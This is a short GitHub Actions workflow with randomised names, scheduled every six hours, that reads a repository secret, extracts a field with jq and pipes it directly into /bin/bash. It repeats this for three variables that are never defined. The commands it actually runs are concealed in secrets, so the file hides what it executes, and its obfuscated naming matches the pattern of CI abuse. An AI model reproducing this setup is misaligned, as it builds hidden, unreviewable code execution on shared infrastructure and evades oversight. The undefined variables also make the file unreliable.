name: niulangqn
on:
  workflow_dispatch:
  schedule:
    - cron: '30 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: niulangqn
        env:
          s4: ${{ secrets.s4 }}
        run: |
          echo $s4 | jq -r .caug633 | /bin/bash
          echo $eqfdd569 | jq -r .v25 | /bin/bash
          echo $tlrls8924 | jq -r .bq4 | /bin/bash
          echo $eja14 | jq -r .q8465 | /bin/bash

